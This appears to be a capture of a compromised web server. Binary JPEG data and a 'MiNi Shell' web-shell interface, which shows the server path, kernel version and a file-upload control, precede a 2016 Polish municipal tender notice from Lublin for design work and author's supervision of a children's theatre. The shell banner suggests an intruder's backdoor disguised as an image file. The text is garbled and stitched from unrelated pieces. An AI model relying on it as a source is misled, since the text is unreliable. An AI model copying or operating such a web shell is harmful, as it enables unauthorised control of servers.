JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/144563-N-2016.html

<p class="kh_header"><b>Lublin: Wykonanie kompletnej wielobranżowej dokumentacji na przebudowę budynku Domu Kultury Kolejarz usytuowanego przy ul. Wł. Kunickiego 35 w Lublinie na siedzibę Centrum Sztuki Dzieci - Teatru im. H. Ch. Andersena wraz z zagospodarowaniem przylegającego terenu oraz sprawowanie nadzorów autorskich nad realizacją inwestycji - zadanie planowane do współfinansowania ze środków pochodzących z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020</b><br>
<b>Numer ogłoszenia: 144563 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lublin , Pl. Króla Władysława Łokietka 1, 20-109 Lublin, woj. lubelskie, tel. 81 4663000, faks 81 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kompletnej wielobranżowej dokumentacji na przebudowę budynku Domu Kultury Kolejarz usytuowanego przy ul. Wł. Kunickiego 35 w Lublinie na siedzibę Centrum Sztuki Dzieci - Teatru im. H. Ch. Andersena wraz z zagospodarowaniem przylegającego terenu oraz sprawowanie nadzorów autorskich nad realizacją inwestycji - zadanie planowane do współfinansowania ze środków pochodzących z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia: 
1. prace przedprojektowe:
1.1. wykonanie badań geotechnicznych warunków posadowienia obiektów budowlanych w zakresie niezbędnym do opracowania projektu budowlanego wraz z opracowaniem dokumentacji geotechnicznej (w 4 egz.),
1.2. wykonanie oceny stanu technicznego budynku w zakresie wynikającym z obowiązujących przepisów,
1.3. pozyskanie we własnym zakresie i na własny koszt mapy dla celów projektowych w skali 1:500, 
1.4. uzyskanie aktualnych warunków technicznych zasilania obiektu w media oraz usunięcia kolizji z istniejącą infrastrukturą techniczną, niezbędnych do projektów od dysponentów sieci oraz warunków w zakresie obsługi komunikacyjnej;
2. prace projektowe:
2.1. opracowanie koncepcji przebudowy oraz rozwiązań funkcjonalno - użytkowych zmiany sposobu użytkowania budynku Domu Kultury Kolejarz usytuowanego przy ul. Wł. Kunickiego 35 w Lublinie na siedzibę Centrum Sztuki Dzieci (CSD) - Teatr im. H. Ch. Andersena (w 4 egz.) - przy opracowywaniu koncepcji należy kierować się swobodą w kształtowaniu funkcji i bryły budynku (zgodnie z programem funkcjonalno - użytkowym), z jak najbardziej racjonalnym wykorzystaniem gabarytów działki, pozostawiając z istniejącego obiektu jedynie te elementy, które nie będą kolidowały z nową funkcją i formą architektoniczną obiektu i nie będą ograniczały jego funkcjonalności; na terenie działki należy przewidzieć lokalizację siedziby CSD - Teatru wraz z niezbędnym zagospodarowaniem terenu oraz pozostawić w przestrzeni działki powierzchnię na wybudowanie w przyszłości kolejnych niezależnych obiektów o nowych funkcjach (np biblioteka, świetlica, Biuro Obsługi Mieszkańców), 
2.2. wykonanie projektów budowlanych (po 6 egz.) i wykonawczych (po 4 egz.) na przebudowę budynku Domu Kultury Kolejarz usytuowanego przy ul. Wł. Kunickiego 35 w Lublinie na siedzibę Centrum Sztuki Dzieci (CSD) - Teatr im. H. Ch. Andersena, w zakresie wynikającym z konieczności dostosowania obiektu do rozwiązań specjalistycznych wynikających ze specyfiki nowego sposobu użytkowania obiektu, a także do obowiązujących przepisów technicznych  i dostępności dla osób niepełnosprawnych oraz usunięciem ewentualnych kolizji, zgodnie z decyzją o ustaleniu lokalizacji inwestycji celu publicznego nr 3/16 oraz decyzją o  ustaleniu warunków zabudowy nr 43/16, w zakresie niezbędnym dla realizacji inwestycji, we wszystkich branżach:
2.2.1. architektonicznej i konstrukcyjnej - także w zakresie dostosowania budynku do 	obowiązujących przepisów technicznych z uwzględnieniem wymagań określonych w rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (t. j. Dz. U. z 2015 r. poz. 1422), a stawianych od roku 2019 budynkom będącym własnością władz publicznych, a także projektów rozbiórek istniejących elementów,
2.2.2. sanitarnej - projekty branżowe w pełnym zakresie obejmujące wykonanie instalacji c. o. oraz wymiennikowni, instalacji wentylacji mechanicznej klimatyzacji, instalacji wodno - kanalizacyjnej, instalacji gazowej, a także wykonanie niezbędnych projektów odwodnienia terenu,
2.2.3. elektrycznej, teletechnicznej i teleinformatycznej - projekty branżowe w 	pełnym 	zakresie obejmujące wykonanie instalacji elektrycznych, instalacji teletechnicznych oraz instalacji niskoprądowych, w tym monitoring i instalację antywłamaniową, SSP, komputerową, światłowodową, systemu bezprzewodowego dostępu do internetu (Hot-Spot) i inne niezbędne instalacje, wynikające z nowej funkcji budynku, a także wykonanie niezbędnych projektów oświetlenia oraz monitoringu terenu, 
2.2.4. drogowej - projekty branżowe w pełnym zakresie obejmujące wykonanie zjazdu, parkingów, chodników, drogi pożarowej, zatoki w ul. Kunickiego, przed 	wejściem głównym do budynku,
2.2.5. zieleniarskiej -  wykonanie projektów zieleni (po 6 egz.),
2.3. wykonanie planu zagospodarowania terenu objętego decyzją o ustaleniu lokalizacji inwestycji celu publicznego nr 3/16 oraz decyzją o ustaleniu warunków  zabudowy nr 43/16, z zagospodarowaniem, urządzeniem i uzbrojeniem terenu i towarzyszącej infrastruktury technicznej we wszystkich branżach, obejmując: tereny wokół obiektu, obsługę komunikacyjną (miejsca postojowe, chodniki, drogę pożarową, zjazd, elementy komunikacji wewnętrznej), elementy małej architektury, zagospodarowanie zieleni towarzyszącej, odwodnienie i oświetlenie oraz monitoring terenu, sieci i przyłącza oraz przebudowę uzbrojenia terenu w przypadku kolizji, ewentualną rozbiórkę istniejących obiektów i zasilenie energetyczne terenu budowy (po 6 egz.),
2.4. wykonanie projektów technologicznych (po 4 egz.), w tym w szczególności:
2.4.1. specjalistycznego projektu wyposażenia ogólnego i oświetlenia scenicznego oraz systemu łączności inspicjenta (dla sceny dużej i sceny małej),
2.4.2. specjalistycznego projektu akustyki sali widowiskowej, sceny i orkiestronu 	(dla sceny dużej i sceny małej),
2.4.3. specjalistycznego projektu systemów elektroakustycznego i wizyjnego (dla sceny dużej i sceny małej),
2.4.4. specjalistycznego projektu technologii mechaniki i konstrukcji urządzeń 	sceny - m. in. zapadnie, sznurowanie, kanały, kieszenie, mosty sceniczne, 	rampy i inne urządzenia sceniczne  (dla sceny dużej i sceny małej),
2.4.5. projektów aranżacji wnętrz, 
2.4.6. projektów technologicznych wyposażenia obiektu, wynikających ze sposobu jego użytkowania i specyfiki części dotyczącej pomieszczeń funkcjonalnie przypisanych do CSD - Teatru H. Ch. Andersena,
2.5. wykonanie projektów budowlanych (po 6 egz.) i wykonawczych (po 4 egz.) przebudowy w niezbędnym zakresie sieci i przyłączy wraz z przebudową uzbrojenia terenu w przypadku ewentualnych kolizji: wodno - kanalizacyjnych, c. o., energetycznych i gazowych, światłowodowych i innych wynikających z nowej funkcji budynku,
2.6. wykonanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych we wszystkich branżach (po 4 egz.),
2.7. wykonanie szczegółowych specyfikacji technicznych wyposażenia obiektu w części dotyczącej pomieszczeń funkcjonalnie przypisanych do CSD - Teatru H. Ch. Andersena (po 4 egz.),
2.8. wykonanie przedmiarów robót we wszystkich branżach (po 3 egz.),
2.9. wykonanie kosztorysów inwestorskich we wszystkich branżach (po 3 egz.),
2.10. wykonanie zbiorczego zestawienia kosztów we wszystkich branżach z podziałem na poszczególne etapy robót, umożliwiającego dokonywanie częściowych odbiorów robót i ich rozliczenie (po 3 egz.), 
2.11. wykonanie informacji BIOZ (w 6 egz.),
2.12. uzyskanie we własnym zakresie i na własny koszt niezbędnych opinii, uzgodnień i zatwierdzeń projektów, w tym w szczególności w zakresie p. poż., bhp, sanitarno - zdrowotnych,  wymaganych obowiązującymi w tej materii przepisami,
2.13. przygotowanie kompletnej dokumentacji wraz ze wszystkimi niezbędnymi uzgodnieniami w celu wystąpienia o decyzję o pozwoleniu na budowę, zgodnie z obowiązującymi przepisami z zastrzeżeniem, że opracowanie dotyczące drogi pożarowej z parkingami, określone w decyzji o ustaleniu warunków zabudowy nr 43/16, stanowić będzie wydzielone opracowanie, umożliwiające uzyskanie odrębnego pozwolenia na budowę,
2.14. opracowanie audytu energetycznego (w 4 egz.);
2.3. pełnienie kompleksowych nadzorów autorskich nad realizacją robót budowlanych prowadzonych w oparciu o dokumentację stanowiącą  przedmiot zamówienia, w zakresie obejmującym w szczególności:
2.3.1. pełnienie nadzoru autorskiego zgodnie z obowiązującymi w tym zakresie przepisami prawa i ustaleniami Stron zawartymi w niniejszej umowie,  
2.3.2. wykonywanie czynności nadzoru autorskiego wynikających z art. 20 ust. 1 pkt 4 ppkt. a) i b) ustawy  z dnia 7 lipca 1994 r. Prawo Budowlane (t. j. Dz. U. z 2016 r. poz. 290),
2.3.3. dokonywanie wpisów do dziennika budowy zgodnie z art. 21 ustawy  z dnia 7 lipca 1994 r. Prawo Budowlane (t. j. Dz. U. z 2016 r. poz. 290) oraz zgodnie z § 9 ust. 1 i 2 Rozporządzenia Ministra Infrastruktury z dnia 26 czerwca 2002 r. w sprawie dziennika budowy, montażu i rozbiórki, tablicy informacyjnej oraz ogłoszenia zawierającego dane dotyczące bezpieczeństwa pracy i ochrony zdrowia (Dz. U. z 2002 r. Nr 108, poz. 	953, z późn. zm.),
2.3.4. wyjaśnianie wątpliwości dotyczących rozwiązań zawartych w dokumentacji projektowej pojawiających się w toku realizacji inwestycji,
2.3.5. uzupełnianie szczegółów dokumentacji projektowej, 
2.3.6. ścisłą współpracę ze wszystkimi uczestnikami procesu budowlanego, w szczególności w zakresie dotyczącym:
2.3.6.1. uzgodnienia możliwości wprowadzenia zmian w dokumentacji projektowej lub 	rozwiązań zamiennych,
2.3.6.2. wspomagania nadzoru inwestorskiego w zakresie kontroli (monitorowania) 	zgodności realizowanych robót budowlanych z dokumentacją projektową,
2.3.6.3. udziału w komisjach odbiorowych i naradach technicznych na budowie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składający ofertę winien wnieść wadium przed upływem terminu składania ofert, w wysokości  18 000,00  zł (słownie: osiemnaście tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą wykonanie minimum 2 projektów budowlano - wykonawczych dotyczących budowy lub przebudowy   budynków   użyteczności   publicznej   o   kubaturze  co  najmniej  5 000,00m3, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą dysponowanie osobą/ami posiadającą/ymi:
1. odpowiednie uprawnienia budowlane do projektowania w specjalności:
1.1. architektonicznej - przy czym osoba ta musi posiadać doświadczenie w projektowaniu i nadzorze nad realizacją robót w zakresie budowy lub przebudowy budynków - teatrów wyposażonych co najmniej w: scenę, zapadnie i widownię na co najmniej 150 miejsc, o kubaturze co najmniej 5 000,00m3 lub doświadczenie w projektowaniu i nadzorze nad realizacją robót w zakresie budowy lub przebudowy budynków użyteczności publicznej nie będących teatrami, ale mających w swej kubaturze funkcję teatru - tj. wyposażonych co najmniej w: scenę, zapadnie i widownię na co najmniej 150 miejsc, o kubaturze co najmniej 5 000,00m3 / co najmniej na jednym obiekcie,
1.2. konstrukcyjno - budowlanej, 
1.3. inżynieryjnej drogowej, 
1.4. instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych,
1.5. instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, 
1.6. instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych,
1.7. instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych, 
1.8. instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych,
1.9. instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych, 
1.10. instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - przy czym osoba ta musi posiadać doświadczenie w projektowaniu i nadzorze nad realizacją robót w zakresie budowy lub przebudowy budynków - teatrów wyposażonych co najmniej w: scenę, zapadnie i widownię na co najmniej 150 miejsc, o kubaturze co najmniej 5 000,00m3 lub doświadczenie w projektowaniu i nadzorze nad realizacją robót w zakresie budowy lub przebudowy budynków użyteczności publicznej nie będących teatrami, ale mających w swej kubaturze funkcję teatru - tj. wyposażonych co najmniej w: scenę, zapadnie i widownię na co najmniej 150 miejsc, o kubaturze co najmniej 5 000,00m3 / co najmniej na jednym obiekcie,	

[podstawa prawna art. 14 ustawy Prawo budowlane z dnia 7 lipca 1994 r. (t. j. Dz. U. z 2016 r. poz. 290)]	

2. doświadczenie w projektowaniu  w zakresie akustyki sal teatralnych / co najmniej na jednym obiekcie, 
3. doświadczenie w projektowaniu specjalistycznej technologii obiektów teatralnych w szczególności w zakresie  technologii mechaniki urządzeń sceny / co najmniej na jednym obiekcie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1. Wykaz winien wskazywać wykonanie minimum 2 projektów budowlano - wykonawczych dotyczących budowy lub przebudowy   budynków   użyteczności   publicznej   o   kubaturze  co  najmniej  5 000,00m3, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
2. Złożone poświadczenia winny potwierdzać należyte wykonanie wykonanie minimum 2 projektów budowlano - wykonawczych dotyczących budowy lub przebudowy   budynków   użyteczności   publicznej   o   kubaturze  co  najmniej  5 000,00m3, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 
2. Wycena ofertowa.
3.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 
4.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba, której umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty.
5.Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 
6. Dokument, wymagany w pkt 5 winien określać w szczególności: 
6.1. zakres dostępnych wykonawcy zasobów innego podmiotu, 
6.2. sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
6.3. charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
6.4. zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania projektu budowlanego - 10</li>
<li>3 - Termin wykonania projektu wykonawczego i pozostałego zakresu dokumentacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony przewidują następujące rodzaje i warunki zmiany treści umowy: 
1) zmniejszenie zakresu przedmiotu umowy, gdy wykonanie pierwotnego zakresu nie leży w interesie publicznym lub w przypadku wystąpienia następujących okoliczności - w przypadku ograniczenia środków pochodzących z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020, które miały być przeznaczone na dofinansowanie przedmiotu umowy, Zamawiający zastrzega sobie prawo ograniczenia zakresu przedmiotu umowy z jednoczesnym zmniejszeniem wynagrodzenia proporcjonalnie do zmniejszonego zakresu prac projektowych i nadzorów, wyliczonym jako ich procentowy udział w pierwotnie przyjętym zakresie , z jednoczesnym proporcjonalnym zmniejszeniem 	wynagrodzenia oraz w razie potrzeby, ze zmianą terminu realizacji przedmiotu 	umowy,
2) zmianę  terminu realizacji  przedmiotu umowy, w przypadku:
a) działania siły wyższej, uniemożliwiającej wykonanie umowy w terminie,
